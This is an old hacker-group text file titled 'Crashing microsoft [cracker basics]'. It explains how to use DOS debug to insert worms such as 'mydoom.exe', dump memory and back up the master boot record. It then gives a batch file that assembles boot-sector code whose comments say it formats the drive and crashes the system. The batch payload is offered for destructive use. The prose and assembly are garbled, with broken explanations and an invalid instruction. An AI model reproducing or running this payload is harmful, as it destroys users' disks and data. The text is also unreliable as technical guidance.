Crashing microsoft [cracker basics]

[Gonzalez]

If you don't have material, toolz or ie connection and you

wish to insert a good code (worm, virus trojan you know) and don't have your favorite

tools you need know how you made that:

take this action for your knowing and risk.

if you need put:

mydoom.exe

you made:

debug mydoom.exe

-rbx

appear on screen the values for:

AX=0006BX=0004CX=0000DX=0000SP=FFEEBP=0000SI=0000DI=0000

DS=0C1BES=0C1BSS=0C1BCS=0C1BIP=010A NV UP EI PL NZ NA PO NC

0C1B:010A 0F DB oF

this values are the flags we need in first instance, before for touch a binary,

remember always the existence for record protection on the flags and here is where

we started:

Made also a backup for our master boot record:

C:> debug
-a
XXXX:100 mov ax,0201
XXXX:103 mov bx,7c00
XXXX:106 mov cx,1
XXXX:109 mov dx,80
XXXX:10C int 13
XXXX:10E int 20
XXXX:110
-g
Program terminated normally
-r cx
CX XXXX
:200
-n a:sector.tbl
-w 7c00
Writing 00200 bytes
-q

This is because under macrosoft windows NEVER we take for confidence our tasks to

dispatcher and the background subsystem administrator

I here where we start made the "dump" for our mydoom exe code:

If AX and CX are how the previous table our file don't pass for a datalink and is not

administred for a cryptography server and is there where we say: "is clear"

we pass througth the dissasemble task:

C:> debug mydoom.exe

- d

mydoom.exe

C:>debug mydoom
???? ?? ??????
-d
13AD:0100  4D 00 00 41 00 00 00 00-00 00 00 00 00 00 00 00   M..A............
13AD:0110  43 4F 4D 53 50 45 43 3D-43 3A 5C 57 34 00 9C 13   COMSPEC=C:W4...
13AD:0120  57 53 5C 53 59 53 54 45-4D 33 32 5C 43 4F 4D 4D   WSSYSTEM32COMM
13AD:0130  41 4E 44 2E 43 4F 4D 00-41 4C 4C 55 53 45 52 53   AND.COM.ALLUSERS
13AD:0140  50 52 4F 46 49 4C 45 3D-43 3A 5C 44 4F 43 55 4D   PROFILE=C:DOCUM
13AD:0150  45 7E 31 5C 41 4C 4C 55-53 45 7E 31 00 41 50 50   E~1ALLUSE~1.APP
13AD:0160  44 41 54 41 3D 43 3A 5C-44 4F 43 55 4D 45 7E 31   DATA=C:DOCUME~1
13AD:0170  5C 61 7A 72 61 65 6C 5C-41 50 50 4C 49 43 7E 31   azraelAPPLIC~1
-d
13AD:0180  00 43 4C 49 45 4E 54 4E-41 4D 45 3D 43 6F 6E 73   .CLIENTNAME=Cons
13AD:0190  6F 6C 65 00 43 4F 4D 4D-4F 4E 50 52 4F 47 52 41   ole.COMMONPROGRA
13AD:01A0  4D 46 49 4C 45 53 3D 43-3A 5C 50 52 4F 47 52 41   MFILES=C:PROGRA
13AD:01B0  7E 31 5C 43 4F 4D 4D 4F-4E 7E 31 00 43 4F 4D 50   ~1COMMON~1.COMP
13AD:01C0  55 54 45 52 4E 41 4D 45-3D 49 52 45 4E 49 43 56   UTERNAME=IRENICV
13AD:01D0  53 00 48 4F 4D 45 44 52-49 56 45 3D 43 3A 00 48   S.HOMEDRIVE=C:.H
13AD:01E0  4F 4D 45 50 41 54 48 3D-5C 00 49 4E 43 4C 55 44   OMEPATH=.INCLUD
13AD:01F0  45 3D 44 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C   E=D:Program Fil
-

We obtain a 1024 block each time we pusk a keyboard key (1024 or 256)

Now if we need crash the system, its simple, perform a "useless" batch file:

@echo off
echo >$ n sco.com
echo >$ a 1024
echo >>$ XOR AX,AX         ; exit to zero code and SS
echo >>$ MOV SS,AX         ; SS prepared on AX
echo >>$ MOV SP,7C00       ; place the pointer to 0000:7C00
echo >>$ STI               ; enbable interrupts
echo >>$ PUSH AX           ; (AX=0)
echo >>$ POP ES            ; Cloack! Cloack! to extra pointer
echo >>$ PUSH AX           ; (AX=0) tester AGaINN
echo >>$ POP DS            ; Segments to zero code
echo >>$ CLD               ; we must erase the address!!
echo >>$ MOV SI,7C1B       ; where we go
echo >>$ MOV DI,061B       ; al offset destination Fuck more BytES
echo >>$ PUSH AX           ; (AX) y (DI) in offset
echo >>$ PUSH DI           ; this is dedicated to macrosoft 0000:061B
echo >>$ MOV CX,FFFFF      ; address and DI undocummented
echo >>$ MOV BP,07BE       ; first entry for BP BT BS
echo >>$ MOV CL,04         ; four ways extra
echo >>$ CMP [BP+00],CH    ; CH to 0
echo >>$ JL  062E          ; find the posibly mbr sector
echo >>$ JNZ 063A          ; xD "Invalid partition table"
echo >>$ ADD BP,+10        ;
echo >>$ LOOP 0620         ;
echo >>$ REP               ; FuckinG AGaINN CX TimES
echo >>$ MOVSB             ; pop-pop-delta bytE per bytE
echo >>$ RETF              ; RETF to jump
echo >>$ INT 13            ; For FucKing FormaT drive fuckinG
echo >>$ w
echo >>$ q
debug <$ >nul
del $

this example show how no need a useless tool, only we mind.

THX 2 to AzRaEL

[NuKE] high council

www.crackenfind.net